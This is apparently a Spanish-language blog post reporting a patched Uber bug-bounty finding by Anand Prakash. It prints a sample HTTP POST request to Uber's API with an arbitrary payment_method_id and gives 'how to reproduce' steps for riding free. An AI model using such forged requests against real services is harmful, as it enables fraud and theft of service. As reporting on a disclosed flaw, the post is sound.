Cómo hackear Uber y viajar gratis

El hacker indio Anand Prakash viajó en Uber gratis debido a una falla que descubrió en la aplicación de la empresa.

Los atacantes cibernéticos podrían haber abusado de esta falla y tener viajar gratis ilimitadas usando sus cuenta de uber.

Uber Technologies Inc. es una compañía con una red del transporte en línea con sede en San Francisco, California, con operaciones en 528 ciudades de todo el mundo.

Los usuarios pueden crear su cuenta en Uber.com y pueden empezar a usar su servicio. Cuando se completa una vuelta el usuario puede pagar en efectivo o usar su tarjeta de crédito o débito.

Sin embargo, mediante la especificación de un método de pago válido, por ejemplo: ABC, XYZ, etc, usted podría usar Uber de forma gratuita.

Para demostrar el error, el hacker obtuvo  permiso del equipo de Uber  y viajó  gratis en los Estados Unidos y la India sin pagar un centavo.


Muestra de código del fallo:


la POST / api / dial / v2 / peticiones HTTP / 1.1
Host: dial.uber.com

{ “start_latitude”: 12.925151699999999, “start_longitude”: 77.6657536,


“product_id”: “db6779d6-d8da-479f-8ac7-8068f4dade6f” “payment_method_id”: “xyz”}

Como reproducir este hack:


1) Hacer la  solicitud anterior con caracteres aleatorios como payment_method_id.

2) Listo, el viaje es Gratis

La prueba de concepto en vídeo:

El equipo de Uber rápidamente corrigió la falla, y el hacker indio Anand Prakash recibió $5.000 dólares como recompensa por haber descubierto la falla.

Anuncios

Dejar un comentario